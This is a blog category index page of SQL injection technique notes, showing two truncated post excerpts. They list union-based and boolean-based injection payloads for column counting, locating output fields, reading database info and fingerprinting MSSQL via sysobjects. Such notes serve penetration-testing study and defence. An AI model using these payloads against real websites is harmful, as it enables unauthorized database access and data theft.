随笔分类 -  姿势总结 / SQL注入

摘要:https://wooyun.js.org/drops/利用insert,update和delete注入获取数据.html 基础流程 # 排序定列数 1' order by 2# # 识别字段输出位置 1' union select 1,2# # 查数据库信息 1' union select use 阅读全文
posted @ 2024-02-20 15:12 DumpInfou 阅读(224) 评论(0) 推荐(1) 编辑
摘要:联合查询注入流程 判断是否存在注入 ?id=1' and 123=123-- ?id=1' and 123=12-- ?id=1' and exists(select * from sysobjects) -- #判断是否为mssql数据库 判断字段数 ?id=1' order by 3-- 判断回 阅读全文
posted @ 2024-02-20 15:11 DumpInfou 阅读(16) 评论(0) 推荐(0) 编辑